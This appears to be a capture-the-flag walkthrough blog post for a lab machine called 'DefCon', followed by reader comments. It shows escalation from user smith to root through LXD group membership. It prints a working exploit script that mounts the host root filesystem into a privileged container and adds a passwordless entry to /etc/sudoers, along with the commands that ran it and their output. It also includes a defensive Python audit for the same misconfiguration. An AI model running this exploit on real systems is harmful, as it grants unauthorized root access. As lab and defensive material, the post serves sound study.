That's odd: lxc is the client program used to run commands against LXD containers.

smith@nsa-server:~$ which lxc

Nothing.

smith@nsa-server:~$ find / -iname "lxc" 2>/dev/null
/etc/bash_completion.d/lxc
/usr/share/bash-completion/completions/lxc
/var/snap/lxd/common/lxc
/snap/bin/lxc
/snap/lxd/10756/bin/lxc
/snap/lxd/10756/commands/lxc
/snap/lxd/10756/lxc
/home/smith/snap/lxd/10756/.config/lxc

There is a folder /snap/bin with executables.

smith@nsa-server:~$ ls -lah /snap/bin
total 8.0K
drwxr-xr-x 2 root root 4.0K Jun  9  2019 .
drwxr-xr-x 5 root root 4.0K Jun  9  2019 ..
lrwxrwxrwx 1 root root    7 Jun  9  2019 lxc -> lxd.lxc
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.benchmark -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.buginfo -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.check-kernel -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.lxc -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.migrate -> /usr/bin/snap

And there is the lxc we need.

smith@nsa-server:~$ /snap/bin/lxc ls
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
+---------+---------+------+------+------------+-----------+

It looks like there is a container, but it's not running.
There is a known exploit for this particular scenario, a bash script written by initstring:

#!/bin/bash

# Local root exploit by initstring (github.com/initstring/lxd_root)
# This takes advantage of the ability of any member of the local `lxd`
# group to mount the host root filesystem into a container, hijacking
# the privileges of root.
#
# We can then use the high-privilege mount to modify the /etc/sudoers file.

USAGE="$(basename "$0") <container name>
The exploit currently requires an existing container."

if [ $# -eq 0 ]
then
    echo "$USAGE"
    exit 0
fi

echo "[+] Stopping container $1"
lxc stop "$1"

echo "[+] Setting container security privilege on"
lxc config set "$1" security.privileged true

echo "[+] Starting container $1"
lxc start "$1"

echo "[+] Mounting host root filesystem to $1"
lxc config device add "$1" rootdisk disk source=/ path=/mnt/root recursive=true

echo "[+] Using container to add $USER to /etc/sudoers"
lxc exec "$1" -- /bin/sh -c "echo $USER 'ALL=(ALL)' NOPASSWD: ALL >> /mnt/root/etc/sudoers"

echo "[+] Unmounting host root filesystem from $1"
lxc config device remove "$1" rootdisk

echo "[+] Resetting container security privilege to off"
lxc config set "$1" security.privileged false

echo "[+] Stopping the container"
lxc stop "$1"

echo "[+] Done! Enjoy your sudo superpowers!"

exit 0

The easiest way is to save this script to a file locally and scp it to the remote system.

n0w4n@lab:~/DefCon$ scp -P 222 lxd-exploit.sh smith@nsa-server.net:/home/smith

Let's see if the file arrived.

smith@nsa-server:~$ ls -lah
total 124K
drwxr-x--- 18 smith smith 4.0K Apr 22 15:38 .
drwxr-xr-x  8 root  root  4.0K Apr 10 14:40 ..
-rw-r-x---  1 smith smith  417 Apr 22 15:38 .bash_history
-rw-r-x---  1 smith smith  220 May 15  2017 .bash_logout
-rw-r-x---  1 smith smith 3.6K Apr 10 20:58 .bashrc
drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .cache
drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .config
drwxr-x---  2 smith smith 4.0K May 10  2019 Desktop
drwxr-x---  2 smith smith 4.0K May 10  2019 Documents
drwxr-x---  2 smith smith 4.0K Apr 10 14:23 Downloads
-rw-r--r--  1 smith smith 1.3K Apr 22 15:34 exploit.sh
drwxr-x---  3 smith smith 4.0K May 10  2019 .gnupg
-rw-r-x---  1 smith smith 5.0K Apr 22 15:38 .ICEauthority
drwxr-x---  3 smith smith 4.0K May 10  2019 .local
-rw-r--r--  1 smith smith 1.3K Apr 22 15:35 lxd-exploit.sh
drwxr-x---  5 smith smith 4.0K May 10  2019 .mozilla
drwxr-x---  2 smith smith 4.0K May 10  2019 Music
-rw-------  1 smith smith  181 Apr 10 21:04 .mysql_history
drwxr-x---  2 smith smith 4.0K May 10  2019 Pictures
drwx------  3 smith smith 4.0K Apr 14 13:19 .pki
-rw-r-x---  1 smith smith  675 May 15  2017 .profile
drwxr-x---  2 smith smith 4.0K May 10  2019 Public
drwxr-xr-x  3 smith smith 4.0K Jun 10  2019 snap
drwxr-x---  2 smith smith 4.0K May 10  2019 .ssh
drwxr-x---  2 smith smith 4.0K May 10  2019 Templates
drwxr-x---  2 smith smith 4.0K May 10  2019 Videos
-rw-------  1 smith smith 8.4K Apr 22 15:34 .viminfo
-rw-r-x---  1 smith smith  256 Jun 10  2019 .wget-hsts

There it is.
Now make the script executable and run it.

smith@nsa-server:~$ chmod +x lxd-exploit.sh 
smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
./lxd-exploit.sh: line 20: lxc: command not found
[+] Setting container security privilege on
./lxd-exploit.sh: line 23: lxc: command not found
[+] Starting container nsa-lab
./lxd-exploit.sh: line 26: lxc: command not found
[+] Mounting host root filesystem to nsa-lab
./lxd-exploit.sh: line 29: lxc: command not found
[+] Using container to add smith to /etc/sudoers
./lxd-exploit.sh: line 32: lxc: command not found
[+] Unmounting host root filesystem from nsa-lab
./lxd-exploit.sh: line 35: lxc: command not found
[+] Resetting container security privilege to off
./lxd-exploit.sh: line 38: lxc: command not found
[+] Stopping the container
./lxd-exploit.sh: line 41: lxc: command not found
[+] Done! Enjoy your sudo superpowers!

Why is it not working? Remember the missing lxc command from earlier? The binary lives in /snap/bin, which is not in smith's PATH, so every lxc call in the script fails and the output only shows the script's own status messages.
Either add that folder to PATH or adjust the script to call lxc by its full path.
Because it is faster to just adjust PATH, we go for that option:

smith@nsa-server:~$ export PATH=/snap/bin:$PATH

Now to run the script again

smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
Try `lxc info --show-log nsa-lab` for more info
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
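
The two steps that matter in the output above are "Setting container security privilege on" and "Mounting host root filesystem", i.e. the container's security.privileged flag is switched on and a disk device backed by the host's / is added. Those are exactly the two settings a defender can watch for. As an added example (not from the write-up and not part of the script it runs), the Python below audits the JSON that `lxc list --format json` prints and flags instances that combine a privileged configuration with a bind mount of a sensitive host path. The sample JSON is constructed and trimmed to the fields the audit reads; the instance names other than nsa-lab and the SENSITIVE_HOST_PATHS list are assumptions.

```python
"""Audit LXD instance configuration for the privileged-container plus host-root-mount pattern.

Added example for this write-up; not the project's or the author's code. Feed it the
output of `lxc list --format json`, which carries `expanded_config` and `expanded_devices`
for every instance.
"""
import json

# Constructed sample of `lxc list --format json` output, cut down to the keys used below.
# Real output carries many more fields. Only "nsa-lab" mirrors the write-up; the other
# two instances are made up for contrast.
SAMPLE_LXC_LIST_JSON = json.dumps([
    {
        "name": "nsa-lab",
        "status": "Running",
        "expanded_config": {"security.privileged": "true", "image.os": "Alpine"},
        "expanded_devices": {
            "root": {"type": "disk", "path": "/", "pool": "default"},
            "rootdisk": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"},
        },
    },
    {
        "name": "web01",
        "status": "Running",
        "expanded_config": {"security.privileged": "false"},
        "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}},
    },
    {
        "name": "build",
        "status": "Stopped",
        "expanded_config": {"security.privileged": "true"},
        "expanded_devices": {
            "root": {"type": "disk", "path": "/", "pool": "default"},
            "src": {"type": "disk", "source": "/srv/build/src", "path": "/src"},
        },
    },
])

# Host paths that should never be bind-mounted into an instance (assumed policy list).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/lib/lxd")


def is_sensitive_path(source):
    """True if `source` is, or lies under, one of the sensitive host paths."""
    for prefix in SENSITIVE_HOST_PATHS:
        if source == prefix or (prefix != "/" and source.startswith(prefix + "/")):
            return True
    return False


def host_bind_mounts(devices):
    """Return (device_name, host_source, container_path) for disk devices backed by a host path.

    A pool-backed root disk has a 'pool' key and no 'source', so it is skipped.
    """
    mounts = []
    for name, dev in devices.items():
        if dev.get("type") != "disk":
            continue
        source = dev.get("source")
        if not source or not source.startswith("/"):
            continue
        mounts.append((name, source, dev.get("path", "")))
    return mounts


def audit_instances(lxc_list_json):
    """Return one finding per instance that is privileged, mounts a sensitive host path, or both."""
    findings = []
    for inst in json.loads(lxc_list_json):
        cfg = inst.get("expanded_config", {})
        privileged = str(cfg.get("security.privileged", "false")).lower() == "true"
        sensitive = [m for m in host_bind_mounts(inst.get("expanded_devices", {}))
                     if is_sensitive_path(m[1])]
        if privileged and sensitive:
            severity = "critical"   # the exact combination the exploit script sets up
        elif privileged or sensitive:
            severity = "warning"
        else:
            continue
        findings.append({
            "name": inst.get("name"),
            "status": inst.get("status"),
            "severity": severity,
            "privileged": privileged,
            "sensitive_mounts": [f"{n}: {s} -> {p}" for n, s, p in sensitive],
        })
    return findings


if __name__ == "__main__":
    for finding in audit_instances(SAMPLE_LXC_LIST_JSON):
        print(f"[{finding['severity'].upper()}] {finding['name']} ({finding['status']}): "
              f"privileged={finding['privileged']} mounts={finding['sensitive_mounts']}")
```

Run on a real host, the same check would be `lxc list --format json` piped into `audit_instances`. A stopped instance still counts, as the "build" entry shows: the configuration is what gets abused, and the script above starts the container itself. The underlying fix is not in the container at all but in group membership, since any member of the lxd group can create such a configuration.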

Let's check those superpowers:

smith@nsa-server:~$ sudo -l
Matching Defaults entries for smith on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User smith may run the following commands on nsa-server:
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL

That will do

smith@nsa-server:~$ sudo su -
root@nsa-server:~#

Now for the flag

root@nsa-server:~# cd /root
root@nsa-server:~# ls -lah
total 164K
drwx------ 24 root root 4.0K Apr 10 21:45 .
drwxr-xr-x 24 root root 4.0K Jun  9  2019 ..
-rw-------  1 root root  163 Apr 14 13:22 .bash_history
-rw-r--r--  1 root root  570 May 14  2019 .bashrc
drwx------  9 root root 4.0K Jun 10  2019 .cache
-rwxr-xr-x  1 root root  171 Apr 10 17:05 clean.sh
drwx------ 11 root root 4.0K Jun 10  2019 .config
drwx------  3 root root 4.0K May 14  2019 .dbus
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Desktop
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Documents
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Downloads
drwxr-xr-x  4 root root 4.0K May 13  2019 endlessh
drwx------  3 root root 4.0K Jun  9  2019 .gnupg
drwx------  2 root root 4.0K Jun  9  2019 .gvfs
-rw-------  1 root root  338 Jun  9  2019 .ICEauthority
-rw-------  1 root root   39 Jun 10  2019 .lesshst
drwxr-xr-x  3 root root 4.0K May 14  2019 .local
drwx------  2 root root 4.0K Mar 10  2018 .mozc
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Music
-rw-------  1 root root 2.3K Apr 10 19:49 .mysql_history
-rw-r--r--  1 root root   30 Apr 10 13:09 names
drwxr-xr-x  2 root root 4.0K Jun 13  2018 .nano
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Pictures
drwx------  3 root root 4.0K May 14  2019 .pki
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Public
-rw-------  1 root root 1.0K Jun 10  2019 .rnd
-rw-r--r--  1 root root 7.8K Apr 10 20:44 root.txt
drwxr-xr-x  3 root root 4.0K Jun  9  2019 snap
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Templates
drwxr-xr-t  2 root root 4.0K Jun  9  2019 thinclient_drives
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Videos
drwxr-xr-x  2 root root 4.0K May 11  2019 .vim
-rw-------  1 root root  14K Apr 10 21:45 .viminfo
drwx------  2 root root 4.0K Jun  9  2019 .vnc
-rw-------  1 root root   56 Jun  9  2019 .Xauthority
-rw-------  1 root root 2.4K Jun  9  2019 .xsession-errors
root@nsa-server:~# cat root.txt 


░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░▓████████████████████████▒░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░▓█████▓▒░░░░░░░░░░░░░░░▒██████▒░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░████▒░░░░░░░░░░░░░░░░░░░░░░░░░▓███▒░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░
░░░░░░░░░░░░░▒██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒██░░░░░░░░░░░░░░
░░░░░░░░░░░░▒██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░░░░░
░░░░░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░░░░
░░░░░░░░░░░██▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░░██░░░░░░░░░░░░
░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░
░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░
░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░
░░░░░░░░░░░██▒░██▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██▓░▒██░░░░░░░░░░░
░░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░░
░░░░░░░░░░░░██▒░██░░░░░▒▒▓███▒░░░░░░░▒███▓▒▒░░░░░██░▓██░░░░░░░░░░░░
░░░░░░░░░░░░░██░██░░██████████▒░░░░░▓██████████░░██▒██░░░░░░░░░░░░░
░░░░░░░░░░░░░░████░████████████░░░░░████████████░████░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░███░▒██████████░░░░░░░██████████▒░██▒░░░░░░░░░▒░░░░░
░░░▒████░░░░░░░▓█▒░░█████████░░░░░░░░░█████████░░▒█▓░░░░░░▓████░░░░
░░░██░▒██▒░░░░░██░░░░██████▓░░░░█░█░░░░███████░░░░██░░░░░███░░██░░░
░░░██░░░██▓░░░░██░░░░░░▒▓▓░░░░▒██░██░░░░░▓▓▒░░░░░▒██░░░░███░░░██░░░
░▓██▒░░░░████▓░░██░░░░░░░░░░░░███░███░░░░░░░░░░░░██░░█████░░░░▓██▒░
██▓░░░░░░░░▒████████▓░░░░░░░░████░███▓░░░░░░░▒▓████████░░░░░░░░░███
██▓▒▓███▓░░░░░░▓████████▓░░░░████░███▓░░░░▓████████▓░░░░░░████▓▓███
░███████████▒░░░░░░███████░░░░██░░░██░░░░██████▓░░░░░░▓███████████░
░░░░░░░░░░▓█████░░░░██▓▓░██░░░░░░░░░░░░░██░█▒██░░░▒█████▓░░░░░░░░░░
░░░░░░░░░░░░░▒█████▒▒█▓█░███▓▓▒▒▒▓▒▒▓▓▓███▒███░▓█████░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░▒████▒▓█▒▒█░█▒█░█░█▓█▒█▓░█░█████▒░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░██░░██▓█▓█▓█▒█▒█▓█▓████░▓█▓░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░▓████▓░▓█▓█░█▒█░█░█▒█▒███▒░██████░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░▓█████░░██░░░▒█████▓█▓█████▒░░░██░▒█████▓░░░░░░░░░░░░░
░░░░▒██████████▓░░░░░███░░░░░░░░░░░░░░░░░░░██▒░░░░░▓██████████▒░░░░
░░░░██░░░▓▓▓░░░░░░▒██████▓░░░░░░░░░░░░░░░███████▒░░░░░░▓▓▒░░▒██░░░░
░░░░▓██░░░░░░░░▓████▓░░░█████▒░░░░░░▒▓█████░░░▓████▓░░░░░░░▒██▓░░░░
░░░░░░███░░░░████▒░░░░░░░░▓█████████████▒░░░░░░░░▒████░░░░███░░░░░░
░░░░░░░██░░░██▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓██░░░██░░░░░░░
░░░░░░░██▒▓██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒██▒▓██░░░░░░░
░░░░░░░░████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░████░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

CONGRATULATIONS!!!!

YOU JUST PWND THIS MACHINE

— finished —


And there you have it.
I really hope you liked this machine and the challenges it presented.
A shout-out would be appreciated and good luck with your next challenge….

24 thoughts on “DefCon”

  1. Hi bro, why did I add nsa-server.net nsa-secretserver.net resolution under hosts, or redirect to nsa-server.net?
    in hosts:
    192.168.123.19 nsa-server.net nsa-secretserver.net

    1. The /etc/hosts file is used by your system to look up hosts when connecting to them through a domain name instead of an IP address.
      When your system wants to connect to another system by the use of a domain name and it doesn’t know the IP address, it uses the name-servers that are available in its configuration (DNS).
      But before it looks for the name-servers, it will check the hosts file first.

  2. Hi,
    I’d like to get a tiny nudge / push in the right direction for user “Smith”. Spent already more than a day on this user but nothing. None of the common tools or manual enumeration helped me.
    Thanks!

        1. Which users do you already have compromised and from which user do you try to jump to user smith?

          1. I have done: John > George > Samantha > Nicky
            I need user Smith and Root.

          2. In this phase…..a basic recon is required.
            You need to know what is happening on this machine and who has access to what.
            When you figure that out, the solution is in front of you.

  3. The only thing I found is:

    Both John and Smith are members of the group ‘mail’. I read a comment between John and Graham that Smith is possibly reading their email. So maybe send some malicious email from John to Smith?

    I have already tried something like that but until now have not managed to get that working, and I am not sure if Smith is reading his mail every now and then?!

    P.s.: If this message is too much spoiler then please reply by email to me please !

      1. Thanks for the email. Did you also get my reply to it (I saw that you used a temporary email address)?!

        I suspect your hint was about Smith -> Root (that will go via [SPOILER]?!), but first I have to become Smith via one of the other users (Nicky, Samantha, John or Graham) and I would like a hint about that 🙂

          1. I have the same question, I’m with user “Nicky” and I’m looking for a way to pass to user “Smith”, could you give me some hint? (Do it by mail to avoid the spoiler). Thanks in advance.

          2. With a basic recon, you will find something on the system that user Nicky has access to.
            To get access you need a piece of information you probably don’t have yet, because of the way you escalated to this user.
            Once you find those 2 things, the way to user smith will become clear.

          3. I did not receive an email on the 20th! Could you forward it once more please?

  4. Why is user smith that hard to escalate to?
    I’ve been turning every stone in this machine and apparently I must have missed something…
    Connecting with v.. to that desktop didn’t reveal anything that I haven’t seen from the terminal session.
    I’m really stuck and would appreciate a small nudge to proceed.

    1. Escalating to user smith isn’t that hard (I know it’s easy for me to say), but the path to take is relatively easy when you have all the information.
      Look for files, then look for a service (you really need the file, or no access to this service), enumerate your findings and escalate to user smith.

      I just added escalating from Samantha to Nicky and I’ll be posting getting to smith next week.
